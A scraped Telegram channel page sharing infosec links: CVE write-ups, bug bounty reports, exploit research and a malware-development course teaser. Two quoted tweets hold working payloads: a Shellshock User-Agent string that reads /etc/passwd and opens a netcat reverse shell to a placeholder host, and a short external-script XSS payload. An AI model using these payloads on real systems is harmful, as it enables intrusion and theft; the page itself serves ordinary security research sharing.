Information Security
@sec_nerd_en
408
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
408 subscribers
Information Security
https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790
GitHub Security Lab
Ubuntu apport PID recycling vulnerability (CVE-2019-15790)
This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).
Information Security
https://i.blackhat.com/asia-20/Friday/asia-20-Yuval-Avrahami-Escaping-Virtualized-Containers.pdf
Information Security
https://dtm.uk/wuauclt/
@dtmsecurity
Code execution via the Windows Update client (wuauclt)
Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.
Today I wanted to share…
Information Security
https://twitter.com/hunter0x7/status/1315541095783292929
Twitter
Ahsan Khan
Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash
Information Security
https://blog.dixitaditya.com/one-click-ssl-pinning-bypass-setup
All Things Security
One-click SSL-Pinning Bypass Setup
This article provides an easy single-click Frida installation script and walkthrough for Android application pentests.
Information Security
https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903
Information Security
https://medium.com/bugbountywriteup/hacking-http-cors-from-inside-out-512cb125c528?source=rss----7b722bfd1b8d---4
Medium
Hacking HTTP CORS from inside out: a theory to practice approach
A theory to practice approach
Information Security
https://h0mbre.github.io/RyzenMaster_CVE/
The Human Machine Interface
CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys
Background Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.
Information Security
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/
GoSecure
Automating local DTD discovery for XXE exploitation
Today, we present the method to exploit XXEs with local a Document Type Declaration (DTD) file. More specifically, how we have built a huge list of reusable DTD files.
Information Security
https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
mksben.l0.cm
Discord Desktop app RCE
A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...
Information Security
https://devcraft.io/2020/10/18/github-rce-git-inject.html
devcraft.io
GitHub - RCE via git option injection (almost) - $20,000 Bounty
It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…
Information Security
https://www.ambionics.io/blog/symfony-secret-fragment
Ambionics
Secret fragments: Remote code execution on Symfony based websites
Remote code execution using Symfony's _fragment's page and unsecure secret values.
Information Security
https://devcraft.io/2020/10/19/github-gist-account-takeover.html
devcraft.io
GitHub Gist - Account takeover via open redirect - $10,000 Bounty
While looking into bypasses for the per form CSRF token in my last post, I was digging into every method that was used to generate urls, trying to find one that could be used to create the required token.
Information Security
https://github.com/BlackFan/client-side-prototype-pollution
GitHub
GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
Prototype Pollution and useful Script Gadgets. Contribute to BlackFan/client-side-prototype-pollution development by creating an account on GitHub.
Information Security
https://twitter.com/trbughunters/status/1318145809750331392?s=20
Twitter
TR Bug Hunters
an XSS payload with script src for short length inputs <script src=//⑮.₨></script> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking
Information Security
https://www.youtube.com/watch?v=Zl2nUJA00Yc
YouTube
Understanding PE relocations in less than 10 min (with PE-bear)
RTO: Malware Development Intermediate course teaser
Link to the course: https://institute.sektor7.net/rto-maldev-intermediate
Other online courses from RED TEAM Operator series: https://institute.sektor7.net
Twitter: https://twitter.com/sektor7net
Labs:…
Information Security
https://devcraft.io/2020/10/18/github-rce-git-inject.html
devcraft.io
GitHub - RCE via git option injection (almost) - $20,000 Bounty
It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…
Information Security
https://medium.com/@ahmdhalabi/my-bug-bounty-journey-ranking-1st-in-u-s-dod-achieving-top-100-hackers-in-1-year-f208c10144fc
Medium
My Bug Bounty Journey & Ranking 1st in U.S. DoD & Achieving top 100 hackers in 1 year
I am sharing some of my methodology, recourses, tips and advices to become a better bug bounty hunter.
Information Security
https://blog.technitium.com/2020/07/how-to-host-your-own-dns-over-https-and.html
Technitium
How To Host Your Own DNS-over-HTTPS, DNS-over-TLS, And DNS-over-QUIC Services
Updated: 15 Jun 2025 With Technitium DNS Server , you can not just consume DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), or DNS-over-QUI...
Information Security
https://github.com/github/dmca/pull/8142